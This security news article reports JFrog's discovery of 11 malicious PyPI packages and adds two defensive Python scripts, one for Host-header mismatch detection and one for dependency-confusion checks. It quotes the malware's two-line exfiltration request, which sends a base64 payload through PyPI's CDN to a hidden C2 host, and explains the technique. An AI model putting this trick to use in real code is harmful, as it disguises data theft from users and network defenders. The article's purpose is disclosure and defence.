GITHUBGEMS: Researchers have discovered 11 malicious Python packages in PyPI

Researchers have discovered 11 malicious Python packages in PyPI that can steal access tokens and passwords and create backdoors

Security experts at JFrog report finding 11 malicious Python packages in the Python Package Index (PyPI) repository, apparently designed to steal access tokens for platforms such as Discord, in addition to hijacking passwords and carrying out dependency confusion attacks.

The list of malicious packages detected during the study is presented below:

▫️ importantpackage / important-package
▫️ pptest
▫️ ipboards
▫️ owlmoon
▫️ DiscordSafety
▫️ trrfab
▫️ 10Cent10 / 10Cent11
▫️ yandex-yt
▫️ yiffparty

Among these packages, experts point out that “importantpackage”, “10Cent10” and “10Cent11” create a reverse shell on the compromised machine. In addition, “importantpackage” abuses the CDN's TLS termination to exfiltrate data, using Fastly's CDN to hide its malicious communication with the C&C server.

url = "https://pypi.python.org" + "/images" + "?" + "Guid=" + b64_payload
r = request.Request(url, headers={"Host": "psec.forward.io.global.prod.fastly.net"})


Researchers note that this code sends an HTTPS request to pypi.python.org; because the CDN terminates TLS and routes on the Host header, it forwards the request as plain HTTP to the C2 server psec.forward.io.global.prod.fastly.net, so on the wire the traffic looks like a legitimate connection to PyPI.
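The distinctive trait of the request above is that the TLS/URL target (pypi.python.org) and the HTTP Host header name different origins. The following detector is an added example written for this article, not code from JFrog or from the malicious packages: it parses egress-proxy log lines in a constructed format (timestamp, client IP, URL and the Host header the client sent), and reports every request whose Host header does not match the URL's host, which is the signature of the Host-header/CDN trick the researchers describe. The log format, client addresses and all lines except the host names quoted in the article are constructed for this example.

```python
"""Flag HTTP requests whose Host header names a different origin than the URL.

Added example, not part of the JFrog report. The log format below is a
constructed stand-in for whatever an egress proxy actually records; the point
is that both the connected host (from the URL / TLS SNI) and the HTTP Host
header must be logged for this mismatch to be visible.
"""
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import urlsplit

# Constructed (hypothetical) proxy log format, one request per line:
#   <timestamp> <client_ip> url=<url> host_header=<value>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) url=(?P<url>\S+) host_header=(?P<host>\S+)$"
)

# Constructed sample log. Line 2 mirrors the request pattern from the article:
# URL host is pypi.python.org, Host header is the Fastly-hosted C2 name.
SAMPLE_LOG = """\
2021-11-19T10:02:11Z 10.0.0.5 url=https://pypi.org/simple/requests/ host_header=pypi.org
2021-11-19T10:02:13Z 10.0.0.5 url=https://pypi.python.org/images?Guid=QUJD host_header=psec.forward.io.global.prod.fastly.net
2021-11-19T10:02:15Z 10.0.0.7 url=https://files.pythonhosted.org/packages/x.whl host_header=files.pythonhosted.org
2021-11-19T10:02:20Z 10.0.0.7 url=https://pypi.org/simple/ host_header=pypi.org:443
"""


def host_mismatch(url: str, host_header: Optional[str]) -> bool:
    """True when the Host header names a different host than the URL does.

    A port suffix (host:443) and a trailing dot are ignored so that ordinary
    requests are not reported as mismatches.
    """
    if not host_header:
        return False
    url_host = (urlsplit(url).hostname or "").lower().rstrip(".")
    hdr_host = host_header.rsplit(":", 1)[0].lower().rstrip(".")
    return url_host != "" and url_host != hdr_host


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one line of the constructed log format; None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_host_mismatches(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one finding per request whose Host header disagrees with its URL."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec and host_mismatch(rec["url"], rec["host"]):
            findings.append(
                {
                    "time": rec["ts"],
                    "client": rec["client"],
                    "url_host": urlsplit(rec["url"]).hostname or "",
                    "host_header": rec["host"],
                }
            )
    return findings


if __name__ == "__main__":
    for hit in find_host_mismatches(SAMPLE_LOG.splitlines()):
        print(
            f"{hit['time']} {hit['client']}: URL host {hit['url_host']} "
            f"but Host header {hit['host_header']}"
        )
```

Run over the sample log, only the second line is reported: client 10.0.0.5 connected to pypi.python.org but asked the CDN for psec.forward.io.global.prod.fastly.net. The fourth line shows why the port is stripped before comparing; without that, a routine "Host: pypi.org:443" would produce a false positive.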

The dependency confusion technique involves uploading malicious packages to public repositories under the same names as an organisation's legitimate internal private packages, but with a higher version number. A package manager configured to consult both the private and the public index then resolves the name to the public, malicious package, which makes this method highly effective at tricking package managers into downloading and installing malicious modules.
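Two things a defender can check for against this technique are whether any internal package name is also present on the public index with a higher version, and whether pip is configured to search the public index alongside the private one. The script below is an added example for this article, not code from JFrog or from the packages discussed: it parses a requirements file, compares a constructed list of internal packages against a constructed snapshot of what the public index serves (a stand-in for querying the index), and flags a pip configuration that uses extra-index-url, the weak setting that makes the name collision exploitable, beside the corrected one that points only at the private index. The package names, versions, index URLs and configuration text are all constructed.

```python
"""Check a project for dependency-confusion exposure.

Added example, not part of the JFrog research. INTERNAL_PACKAGES,
PUBLIC_INDEX_SNAPSHOT, REQUIREMENTS and the two pip configurations are
constructed sample data; in practice the snapshot would come from querying
the public index for each internal package name.
"""
import configparser
import re
from typing import Dict, List, Tuple

# Constructed: packages that exist only on the organisation's private index.
INTERNAL_PACKAGES = {"acme-billing": "1.4.0", "acme_auth": "0.9.2", "acme-logs": "2.0.0"}

# Constructed snapshot of the public index. "acme-billing" has been squatted
# with an implausibly high version, the classic dependency-confusion setup.
PUBLIC_INDEX_SNAPSHOT = {"requests": "2.26.0", "acme-billing": "99.0.0", "acme-auth": "0.9.2"}

# Constructed requirements file for the project being checked.
REQUIREMENTS = """\
requests==2.26.0
acme-billing          # unpinned: resolves to the highest version found
acme_auth==0.9.2
acme-logs==2.0.0
"""

# Weak: both indexes are searched and the highest version wins.
WEAK_PIP_CONF = """\
[global]
index-url = https://pypi.org/simple
extra-index-url = https://pypi.internal.example/simple
"""

# Corrected: only the private index is consulted (it proxies public packages).
SAFE_PIP_CONF = """\
[global]
index-url = https://pypi.internal.example/simple
"""


def normalize(name: str) -> str:
    """PEP 503 name normalisation: lower-case, runs of -_. collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_version(v: str) -> Tuple[int, ...]:
    """Simplified numeric version tuple; use packaging.version in real code."""
    return tuple(int(p) if p.isdigit() else 0 for p in v.split("."))


def parse_requirements(text: str) -> Dict[str, str]:
    """Map normalised requirement names to their '==' pin ('' when unpinned)."""
    reqs: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        m = re.match(r"([A-Za-z0-9][A-Za-z0-9._-]*)\s*(?:==\s*([\w.]+))?", line)
        if m:
            reqs[normalize(m.group(1))] = m.group(2) or ""
    return reqs


def find_confusable(reqs: Dict[str, str], internal: Dict[str, str],
                    public: Dict[str, str]) -> List[dict]:
    """Report internal packages the project uses that also exist publicly."""
    public_norm = {normalize(k): v for k, v in public.items()}
    findings = []
    for name, internal_ver in internal.items():
        n = normalize(name)
        if n not in reqs or n not in public_norm:
            continue
        public_ver = public_norm[n]
        findings.append({
            "package": name,
            "internal_version": internal_ver,
            "public_version": public_ver,
            # Highest version wins when both indexes are searched.
            "public_wins": parse_version(public_ver) > parse_version(internal_ver),
            "pinned": bool(reqs[n]),
        })
    return findings


def pip_config_mixes_indexes(conf_text: str) -> bool:
    """True if pip.conf sets extra-index-url, i.e. private and public are mixed."""
    cp = configparser.ConfigParser()
    cp.read_string(conf_text)
    return cp.has_option("global", "extra-index-url")


if __name__ == "__main__":
    reqs = parse_requirements(REQUIREMENTS)
    for f in find_confusable(reqs, INTERNAL_PACKAGES, PUBLIC_INDEX_SNAPSHOT):
        print(f)
    print("weak config mixes indexes:", pip_config_mixes_indexes(WEAK_PIP_CONF))
    print("safe config mixes indexes:", pip_config_mixes_indexes(SAFE_PIP_CONF))
```

Against the sample data, acme-billing is reported with public_wins set (99.0.0 beats 1.4.0 and the requirement is unpinned), acme_auth is reported as a name collision that does not currently win, and acme-logs is not reported because it has no public twin. Pinning a version does not remove the exposure on its own; a squatter can publish the same version number, so the pip configuration check matters as much as the name check.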

In conclusion, the researchers noted that while this attack is similar to other hacking methods, it gives attackers the ability to act stealthily and can also serve as a prelude to subsequent attacks.
